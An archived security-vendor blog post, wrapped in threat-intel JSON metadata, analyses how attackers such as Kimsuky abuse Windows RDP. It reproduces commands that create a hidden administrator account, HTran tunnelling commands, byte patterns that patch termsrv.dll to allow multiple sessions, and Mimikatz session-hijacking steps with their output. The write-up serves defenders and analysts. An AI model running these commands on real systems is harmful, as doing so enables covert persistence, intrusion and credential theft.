{
	"id": "1e5bcaa5-f1b0-4c55-943e-b15289ec2f94",
	"created_at": "2026-04-06T00:19:14.382226Z",
	"updated_at": "2026-04-10T03:38:10.019649Z",
	"deleted_at": null,
	"sha1_hash": "26cd7f51e94c444b08a0b3bfb006dadff4b45a15",
	"title": "Analysis on Attack Techniques and Cases Using RDP",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1478571,
	"plain_text": "Analysis on Attack Techniques and Cases Using RDP\r\nBy ATCP\r\nPublished: 2022-10-11 · Archived: 2026-04-05 22:29:56 UTC\r\nOverview\r\nOne of the previous ASEC blog posts discussed cases where attackers abused various remote control tools, originally intended for system management, to gain control over infected systems.[1] This post covers cases where RDP (Remote Desktop Protocol), a service provided by default in the Windows OS, was used.\r\nRDP is commonly used in attacks because it is convenient for initial compromise and lateral movement compared to remote control tools that require an additional installation step.\r\nThe Windows OS supports Remote Desktop Services, which can be used without installing additional remote control tools. This is only possible when Remote Desktop Services is already enabled; otherwise, it must be enabled through additional steps.\r\nFor initial compromise, attackers who have obtained the credentials of the target system can use RDP to access and gain control over it. The same applies to lateral movement: credentials collected from systems on the internal network can be used to spread the infection internally. Aside from this method, attackers also use malware that adds an account for the attacker to the infected system in order to maintain persistence.\r\nBelow is a summary of such attack cases as well as the various techniques that can be used in RDP attacks, alongside their respective tools.\r\nCases of Attacks\r\nCases of APT Attacks\r\nCases of attacks using RDP are particularly common in APT attacks. 
In the ASEC blog post “Case of Ransomware Infection in a Company Using Local Administrator Accounts Set with Same Password,” the team covered a case where the attacker obtained the credentials of the local administrator of the target system, connected to it using RDP, and installed the Lockis ransomware.[2]\r\nSSH and PsExec are also used in various APT attacks by the Conti ransomware group[3] and the DarkSide ransomware group.[4]\r\nAside from the remote desktop feature installed by default on Windows, there are cases where attackers install and use RDP Wrapper. RDP Wrapper is an open source utility that provides the remote desktop feature. Since not all Windows editions support remote desktop, RDP Wrapper needs to be installed to enable the feature on those systems. The Kimsuky group installs RDP Wrapper on multiple systems infected with AppleSeed.[5]\r\nAdding User Accounts\r\nhttps://asec.ahnlab.com/en/40394/\r\nPage 1 of 11\n\nUntil now, we have mostly covered methods where the user credentials of infected systems were stolen and then used to access the system through RDP. However, multiple cases have been found recently where new users were added to infected systems and then used to gain access. Through this method, attackers can maintain persistence and access the infected system at any time. As the newly added account must not stand out to existing users, techniques for hiding the added account are also used.\r\nKIMSUKY\r\nThe Kimsuky group has also distributed malware that adds user accounts to infected systems in this way.[6] The PIF dropper malware disguised as attachments to spear phishing emails usually drops AppleSeed, but malware responsible for adding RDP users is also being distributed. 
These types of malware ultimately add the following user account.\r\nUser account: default\r\nPassword: 1qaz2wsx#EDC\r\nThe malware adds the account by executing the simple command line commands shown below. When the commands have finished, that is, when the malware has achieved its aim, it deletes itself using a batch file.\r\n\u003e net user /add default 1qaz2wsx#EDC\r\n\u003e net localgroup Administrators default /add\r\n\u003e net localgroup “Remote Desktop Users” default /add\r\n\u003e reg add “HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList” /v default /t REG_DWORD /d 0 /f\r\n\u003e reg add “HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f\r\nExamining each command shows that the net commands register a user named “default.” The user is added to the Administrators group as well as the Remote Desktop Users group, so the account is evidently intended for later RDP access. The malware then registers the added account under the SpecialAccounts\\UserList registry key with a value of 0 so that the account does not appear on the login screen and the user cannot tell that an account has been added. Finally, it sets fDenyTSConnections to 0, which enables remote desktop connections.\r\nMalware Targeting MS-SQL Servers\r\nRecently, malware that adds user accounts has been distributed to inadequately managed MS-SQL servers. Judging from the other malware installed on these systems, it appears they were installed after the systems were compromised via dictionary attacks made possible by weak account credentials. The malware in question is created with bat2exe, and upon execution, it generates and runs the following batch file.\r\nThe features of the batch script are similar to those of the Kimsuky group malware explained above. It adds a user account and registers it under SpecialAccounts to prevent users from noticing it. 
In addition, it adds firewall settings and activates the RDP service.\r\nTools for Adding Accounts\r\nAside from malware that directly adds user accounts, attackers can also use publicly available tools to add user accounts. For example, CreateHiddenAccount is a tool developed in Go and published on GitHub.[7] Attackers target inadequately managed MS-SQL servers and use CreateHiddenAccount to add user accounts without having to go through the more involved process described above.\r\nRDP Related Malware\r\nREVERSE RDP\r\nEven if the infected system’s address and account credentials are known, if the system is on a private network, direct access is not possible unless settings such as port forwarding have been configured. For this reason, as with most malware, rather than having the attacker connect to the infected system first, the method used is for the malware running on the infected system to connect out to the attacker, that is, to the C\u0026C server, in the same direction as a Reverse Shell.\r\nAveMaria uses RdpWrapper instead of the RDP provided by default in Windows.[8] To do this, it first drops the RdpWrapper DLL onto the infected PC and registers it as a service. Afterward, it creates a random string and adds a user account using it as the ID and password. Then, it registers the added user account under the SpecialAccount registry key so that the user cannot tell that an account has been added. 
Lastly, the added ID and password are saved to the registry keys shown below.\r\nID : HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer[random] / rudp\r\nPassword : HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer[random] / rpdp\r\nAveMaria then attempts to connect to the C\u0026C server using the Reverse RDP method, allowing the attacker to control the infected PC remotely via AveMaria.\r\nPORT FORWARDING\r\nPort forwarding is a feature where data received on one port is forwarded to another port. Using this allows the malware to bypass NAT by communicating through the Reverse method, just like AveMaria above, while at the same time relaying the data to another port, the RDP port, to enable remote control.\r\nThere is a variety of tools that support port forwarding, but this blog post takes HTran as the main example, as its source code has been made public and it has been in use for a long time. HTran supports the following 3 modes.[9]\r\nOne of the modes provided by HTran is the “-listen” mode, which receives 2 port numbers as arguments and binds to each port while waiting. Once connections are established on both ports, the data received from one port is forwarded to the other. Ordinarily, the “-listen” mode is used alongside the “-slave” mode. The “-slave” mode is similar to the “-tran” mode: where the “-tran” mode opens a particular port on the local system and awaits connections, the “-slave” mode connects directly to the designated address.\r\nThe following is a log where HTran malware with the file name “p” was executed in the “-slave” mode. 
When it is run with these arguments, it attempts to connect to the address A(1..**.8):1000, and when a connection is established, the traffic is forwarded to port 3389 of the local system.\r\n\u003e p 1..**.8 1000 127.0.0.1 3389\r\nOn the A:1000 system, HTran runs in the “-listen” mode as shown below. (For example purposes, the first argument is set to 80.) Accordingly, the attacker connects to the A:80 address and is able to initiate RDP access to the target system. HTran running on A forwards the data received on port 80 to port 1000, because port 1000 is linked to the HTran running on the target system. Finally, the HTran on the target system forwards the transmitted data to the local system’s port 3389.\r\n\u003e HTran.exe 1000 80\r\nMULTI RDP\r\nOnly 1 RDP session per PC is allowed in a normal Windows environment. Because of this, even if the attacker knows the account credentials of the infected system, he or she cannot make an RDP connection without the user realizing it while the user is working locally or another user is currently accessing the system via RDP. This is because if the attacker connects via RDP while the current user is logged in, the current user will be logged off.\r\nTo bypass this, the attacker may patch the memory of the Remote Desktop Service to allow multiple remote desktop sessions. For instance, Mimikatz supports such a feature with the ts::multirdp command.[10] When the ts::multirdp command is used, the address of the corresponding DLL, termsrv.dll, is located in the svchost.exe process hosting the currently running Remote Desktop Service, and a certain binary pattern is searched for. As the pattern differs for each Windows version, each version has a defined search pattern. 
When the defined pattern is found, the malware patches it with a new one, allowing multiple RDP sessions.\r\nThe Kimsuky group also uses malware responsible for memory patching for multiple RDP sessions, much like the feature of Mimikatz.[11] It is a DLL, like most malware recently used by the Kimsuky group, and is executed by regsvr32.exe. The currently discovered sample is an x64 binary, so it only operates on the x64 Windows architecture. Its search and patch patterns are similar to the source code of Mimikatz, but one difference is that it also supports Windows XP. The search patterns and the patterns to be patched for each Windows version are as follows:\r\nVersion (x64) | Search Pattern | Patch Pattern\r\nWindows XP (2600) or later | {0x83, 0xf8, 0x02, 0x7f} | {0x90, 0x90}\r\nWindows Vista (6000) | {0x8b, 0x81, 0x38, 0x06, 0x00, 0x00, 0x39, 0x81, 0x3c, 0x06, 0x00, 0x00, 0x75} | {0xc7, 0x81, 0x3c, 0x06, 0x00, 0x00, 0xff, 0xff, 0xff, 0x7f, 0x90, 0x90, 0xeb}\r\nWindows 7 (7600) | {0x39, 0x87, 0x3c, 0x06, 0x00, 0x00, 0x0f, 0x84} | {0xc7, 0x87, 0x3c, 0x06, 0x00, 0x00, 0xff, 0xff, 0xff, 0x7f, 0x90, 0x90}\r\nWindows 8.1 (9600) | {0x39, 0x81, 0x3c, 0x06, 0x00, 0x00, 0x0f, 0x84} | {0xc7, 0x81, 0x3c, 0x06, 0x00, 0x00, 0xff, 0xff, 0xff, 0x7f, 0x90, 0x90}\r\nWindows 10, Version 1803 (17134) | {0x8b, 0x99, 0x3c, 0x06, 0x00, 0x00, 0x8b, 0xb9, 0x38, 0x06, 0x00, 0x00, 0x3b, 0xdf, 0x0f, 0x84} | {0xc7, 0x81, 0x3c, 0x06, 0x00, 0x00, 0xff, 0xff, 0xff, 0x7f, 0x90, 0x90, 0x90, 0x90, 0x90, 0xe9}\r\nWindows 10, Version 1809 (17763) or later | {0x8b, 0x81, 0x38, 0x06, 0x00, 0x00, 0x39, 0x81, 0x3c, 0x06, 0x00, 0x00, 0x0f, 0x84} | {0xc7, 0x81, 0x3c, 0x06, 0x00, 0x00, 0xff, 0xff, 0xff, 0x7f, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90}\r\nTable 1. 
RDP service search and patch patterns\r\nStealing RDP Credentials\r\nIf RDP account information can be obtained when a user remotely accesses another internal system, the stolen credentials can be used for lateral movement. To do this, attackers install keyloggers to collect account information when users log in to the remote desktop, or steal RDP credentials saved on the local system for other systems. Mimikatz can steal account information both when the current user is using the remote desktop and when another user is logged in.\r\nWhen another user is logged into the current system via the remote desktop, the ts::logonpasswords command of Mimikatz extracts and displays the remote access credentials of the currently running session. Below are the results shown when another user is logged into the current system with the domain_admin account.[12]\r\nIn contrast, when a user is working on another system by logging in via the remote desktop, the ts::mstsc command extracts and displays the credentials of the remote target from the currently running mstsc process. This means that when the ts::mstsc command of Mimikatz is executed while a user is logged into another system with the domain_admin account, it becomes possible to steal the credentials used to log into that remote system.\r\nOrdinarily, if there is a target system where the remote desktop is frequently used, the ID and password can be saved to enable automatic login instead of having to enter them every time. In this case, the RDP credentials are saved in the local Vault. 
Because Mimikatz can steal the RDP credentials saved in this Vault with the vault::cred command, saved RDP credentials can be stolen even when no remote connection to the particular target is established and even when no other user is remotely logged in.\r\nRDP HIJACKING\r\nRDP hijacking is a technique of taking over another user’s remote desktop session for lateral movement. When the attacker has obtained SYSTEM privileges on the current system, the RDP hijacking technique allows them to take over an RDP session even without knowing the credentials of other users. Thus, an attacker who has compromised a system and obtained SYSTEM privileges can use the remote desktop on that server to take over the sessions of other logged-in users and use them to access the system. This works both remotely and locally, and regardless of whether the session is active or disconnected, as long as the session has not been logged out.\r\nFor example, the attacker can use the terminal services console (tscon.exe) for RDP hijacking, and Mimikatz also supports this with the “ts::remote” command. With the “privilege::debug” and “token::elevate” commands, Mimikatz can also obtain SYSTEM privileges. 
Afterwards, the current sessions can be listed using the “ts::sessions” command, and if the number of the target session for hijacking is 2, the “ts::remote /id:2” command will switch over to the target session.\r\nmimikatz # privilege::debug\r\nmimikatz # token::elevate\r\nmimikatz # ts::multirdp\r\nmimikatz # ts::sessions\r\nSession: 0 – Services\r\n…\r\nSession: *1 – Console\r\nstate: Active (0)\r\nuser : ahnlab_user @ DESKTOP\r\nConn : 2021-06-16 2:28:59 PM\r\ndisc : 2021-06-16 2:28:59 PM\r\nlogon: 2021-06-16 2:29:00 PM\r\nlast : 2021-06-16 2:28:59 PM\r\ncurr : 2021-06-16 2:31:16 PM\r\nlock : no\r\nSession: 2 – RDP-Tcp#2\r\nstate: Active (0)\r\nuser : ahnlab_user2 @ DESKTOP\r\nConn : 2021-06-16 2:31:07 PM\r\nlogon: 2021-06-16 2:31:08 PM\r\nlast : 2021-06-16 2:31:14 PM\r\ncurr : 2021-06-16 2:31:16 PM\r\nlock : no\r\naddr4: 192.168..\r\nSession: 65536 – RDP-Tcp\r\n…\r\nmimikatz # ts::remote /id:2\r\nAsking to connect from 2 to current session\r\nConnected to 2\r\nLateral Movement\r\nAs seen in the cases above, RDP is used not only for initial compromise but also frequently for lateral movement. The important point is that even if the credentials of the target system are not known in plain text, lateral movement is possible via the NT hash. Just as with SMB and WMI, the RDP protocol can be used in Pass the Hash attacks using the NT hash, with tools such as xfreerdp.\r\nIf “Restricted Admin Mode” is enabled on the remote system, mstsc can be used as well. 
For reference, the following registry setting must be configured to enable Restricted Admin Mode.\r\nHKLM\\SYSTEM\\CurrentControlSet\\Control\\LSA / “DisableRestrictedAdmin” (DWORD)\r\n0: Enable Restricted Admin Mode\r\nIn the example below, the NT hash of the obtained domain admin account was used to run mstsc in “Restricted Admin Mode” via an Overpass the Hash attack. The mstsc pop-up shows the text “Windows login credentials are used to connect”. Afterwards, entering the address of the remote system and attempting to connect establishes a connection without the need to input account information.\r\nConclusion\r\nAttackers have long used RDP in the initial compromise and lateral movement phases. Recently, instead of installing additional backdoor malware, a technique of gaining control by adding user accounts has been used. Because both the method of using stolen account information and the method of the attacker directly adding an account rely on the remote desktop service provided by default on Windows, adequate management is required to detect or prevent them.\r\nUsers must refrain from opening attachments in suspicious emails, and when installing external software, it is advised to purchase or download it from the official website. Additionally, users must set complex passwords for their accounts and change them periodically. 
Also, V3 should be updated to the latest version so that malware infection can be prevented.\r\n[File Detection]\r\n– Trojan/Win.Agent.C5245646 (2022.09.27.02)\r\n– Trojan/BAT.Agent.SC183591 (2022.09.27.03)\r\n– Malware/Win.Generic.C4933135 (2022.01.27.00)\r\n– HackTool/Win.UserAdd.C5271969 (2022.10.04.02)\r\nReference\r\n[1] [ASEC Blog] Attackers Abusing Various Remote Control Tools\r\n[2] [ASEC Blog] Case of Ransomware Infection in a Company Using Local Administrator Accounts Set with Same Password\r\n[3] [The DFIR Report] BazarLoader and the Conti Leaks\r\n[4] [Cyware] DarkSide: A Deep Dive Into The Threat Actor That Took Colonial Pipeline Down\r\n[5] [ASEC Blog] Analysis Report on Kimsuky Group’s APT Attacks (AppleSeed, PebbleDash)\r\n[6] [ASEC Blog] Analysis Report on Kimsuky Group’s APT Attacks (AppleSeed, PebbleDash)\r\n[7] [Github] CreateHiddenAccount\r\n[8] [ASEC Blog] AveMaria malware being distributed as spam mail\r\n[9] [ASEC Blog] Attackers Using FRP (Fast Reverse Proxy) to Attack Korean Companies\r\n[10] [AhnLab TIP] Analysis Report on Internal Web Spreading Methods Using Mimikatz\r\n[11] [ASEC Blog] Analysis Report on Kimsuky Group’s APT Attacks (AppleSeed, PebbleDash)\r\n[12] [AhnLab TIP] Analysis Report on Internal Web Spreading Methods Using Mimikatz\r\nMD5\r\n185bc3037314ec2dbd6591ad72cf08b4\r\n81ee91290a78d2d38b47a7ae25ec717f\r\nb500a8ffd4907a1dfda985683f1de1df\r\nAdditional IOCs are available on AhnLab TIP.\r\nURL\r\nhttp[:]//80[.]66[.]76[.]22/servicem[.]exe\r\nAdditional IOCs are available on AhnLab TIP.\r\nGain access to related IOCs and detailed analysis by subscribing to AhnLab TIP.\r\nSource: https://asec.ahnlab.com/en/40394/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://asec.ahnlab.com/en/40394/"
	],
	"report_names": [
		"40394"
	],
	"threat_actors": [
		{
			"id": "cf7fc640-acfe-41c4-9f3d-5515d53a3ffb",
			"created_at": "2023-01-06T13:46:38.228042Z",
			"updated_at": "2026-04-10T02:00:02.883048Z",
			"deleted_at": null,
			"main_name": "APT1",
			"aliases": [
				"PLA Unit 61398",
				"Comment Crew",
				"Byzantine Candor",
				"Comment Group",
				"GIF89a",
				"Group 3",
				"TG-8223",
				"Brown Fox",
				"ShadyRAT",
				"G0006",
				"COMMENT PANDA"
			],
			"source_name": "MISPGALAXY:APT1",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "191d7f9a-8c3c-442a-9f13-debe259d4cc2",
			"created_at": "2022-10-25T15:50:23.280374Z",
			"updated_at": "2026-04-10T02:00:05.305572Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"Kimsuky",
				"Black Banshee",
				"Velvet Chollima",
				"Emerald Sleet",
				"THALLIUM",
				"APT43",
				"TA427",
				"Springtail"
			],
			"source_name": "MITRE:Kimsuky",
			"tools": [
				"Troll Stealer",
				"schtasks",
				"Amadey",
				"GoBear",
				"Brave Prince",
				"CSPY Downloader",
				"gh0st RAT",
				"AppleSeed",
				"Gomir",
				"NOKKI",
				"QuasarRAT",
				"Gold Dragon",
				"PsExec",
				"KGH_SPY",
				"Mimikatz",
				"BabyShark",
				"TRANSLATEXT"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "760f2827-1718-4eed-8234-4027c1346145",
			"created_at": "2023-01-06T13:46:38.670947Z",
			"updated_at": "2026-04-10T02:00:03.062424Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"G0086",
				"Emerald Sleet",
				"THALLIUM",
				"Springtail",
				"Sparkling Pisces",
				"Thallium",
				"Operation Stolen Pencil",
				"APT43",
				"Velvet Chollima",
				"Black Banshee"
			],
			"source_name": "MISPGALAXY:Kimsuky",
			"tools": [
				"xrat",
				"QUASARRAT",
				"RDP Wrapper",
				"TightVNC",
				"BabyShark",
				"RevClient"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "c8bf82a7-6887-4d46-ad70-4498b67d4c1d",
			"created_at": "2025-08-07T02:03:25.101147Z",
			"updated_at": "2026-04-10T02:00:03.846812Z",
			"deleted_at": null,
			"main_name": "NICKEL KIMBALL",
			"aliases": [
				"APT43 ",
				"ARCHIPELAGO ",
				"Black Banshee ",
				"Crooked Pisces ",
				"Emerald Sleet ",
				"ITG16 ",
				"Kimsuky ",
				"Larva-24005 ",
				"Opal Sleet ",
				"Ruby Sleet ",
				"SharpTongue ",
				"Sparking Pisces ",
				"Springtail ",
				"TA406 ",
				"TA427 ",
				"THALLIUM ",
				"UAT-5394 ",
				"Velvet Chollima "
			],
			"source_name": "Secureworks:NICKEL KIMBALL",
			"tools": [
				"BabyShark",
				"FastFire",
				"FastSpy",
				"FireViewer",
				"Konni"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "71a1e16c-3ba6-4193-be62-be53527817bc",
			"created_at": "2022-10-25T16:07:23.753455Z",
			"updated_at": "2026-04-10T02:00:04.73769Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"APT 43",
				"Black Banshee",
				"Emerald Sleet",
				"G0086",
				"G0094",
				"ITG16",
				"KTA082",
				"Kimsuky",
				"Larva-24005",
				"Larva-25004",
				"Operation Baby Coin",
				"Operation Covert Stalker",
				"Operation DEEP#DRIVE",
				"Operation DEEP#GOSU",
				"Operation Kabar Cobra",
				"Operation Mystery Baby",
				"Operation Red Salt",
				"Operation Smoke Screen",
				"Operation Stealth Power",
				"Operation Stolen Pencil",
				"SharpTongue",
				"Sparkling Pisces",
				"Springtail",
				"TA406",
				"TA427",
				"Thallium",
				"UAT-5394",
				"Velvet Chollima"
			],
			"source_name": "ETDA:Kimsuky",
			"tools": [
				"AngryRebel",
				"AppleSeed",
				"BITTERSWEET",
				"BabyShark",
				"BoBoStealer",
				"CSPY Downloader",
				"Farfli",
				"FlowerPower",
				"Gh0st RAT",
				"Ghost RAT",
				"Gold Dragon",
				"GoldDragon",
				"GoldStamp",
				"JamBog",
				"KGH Spyware Suite",
				"KGH_SPY",
				"KPortScan",
				"KimJongRAT",
				"Kimsuky",
				"LATEOP",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Lovexxx",
				"MailPassView",
				"Mechanical",
				"Mimikatz",
				"MoonPeak",
				"Moudour",
				"MyDogs",
				"Mydoor",
				"Network Password Recovery",
				"PCRat",
				"ProcDump",
				"PsExec",
				"ReconShark",
				"Remote Desktop PassView",
				"SHARPEXT",
				"SWEETDROP",
				"SmallTiger",
				"SniffPass",
				"TODDLERSHARK",
				"TRANSLATEXT",
				"Troll Stealer",
				"TrollAgent",
				"VENOMBITE",
				"WebBrowserPassView",
				"xRAT"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "3aaf0755-5c9b-4612-9f0e-e266ef1bdb4b",
			"created_at": "2022-10-25T16:07:23.480196Z",
			"updated_at": "2026-04-10T02:00:04.626125Z",
			"deleted_at": null,
			"main_name": "Comment Crew",
			"aliases": [
				"APT 1",
				"BrownFox",
				"Byzantine Candor",
				"Byzantine Hades",
				"Comment Crew",
				"Comment Panda",
				"G0006",
				"GIF89a",
				"Group 3",
				"Operation Oceansalt",
				"Operation Seasalt",
				"Operation Siesta",
				"Shanghai Group",
				"TG-8223"
			],
			"source_name": "ETDA:Comment Crew",
			"tools": [
				"Auriga",
				"Cachedump",
				"Chymine",
				"CookieBag",
				"Darkmoon",
				"GDOCUPLOAD",
				"GLOOXMAIL",
				"GREENCAT",
				"Gen:Trojan.Heur.PT",
				"GetMail",
				"Hackfase",
				"Hacksfase",
				"Helauto",
				"Kurton",
				"LETSGO",
				"LIGHTBOLT",
				"LIGHTDART",
				"LOLBAS",
				"LOLBins",
				"LONGRUN",
				"Living off the Land",
				"Lslsass",
				"MAPIget",
				"ManItsMe",
				"Mimikatz",
				"MiniASP",
				"Oceansalt",
				"Pass-The-Hash Toolkit",
				"Poison Ivy",
				"ProcDump",
				"Riodrv",
				"SPIVY",
				"Seasalt",
				"ShadyRAT",
				"StarsyPound",
				"TROJAN.COOKIES",
				"TROJAN.FOXY",
				"TabMsgSQL",
				"Tarsip",
				"Trojan.GTALK",
				"WebC2",
				"WebC2-AdSpace",
				"WebC2-Ausov",
				"WebC2-Bolid",
				"WebC2-Cson",
				"WebC2-DIV",
				"WebC2-GreenCat",
				"WebC2-Head",
				"WebC2-Kt3",
				"WebC2-Qbp",
				"WebC2-Rave",
				"WebC2-Table",
				"WebC2-UGX",
				"WebC2-Yahoo",
				"Wordpress Bruteforcer",
				"bangat",
				"gsecdump",
				"pivy",
				"poisonivy",
				"pwdump",
				"zxdosml"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434754,
	"ts_updated_at": 1775792290,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/26cd7f51e94c444b08a0b3bfb006dadff4b45a15.pdf",
		"text": "https://archive.orkl.eu/26cd7f51e94c444b08a0b3bfb006dadff4b45a15.txt",
		"img": "https://archive.orkl.eu/26cd7f51e94c444b08a0b3bfb006dadff4b45a15.jpg"
	}
}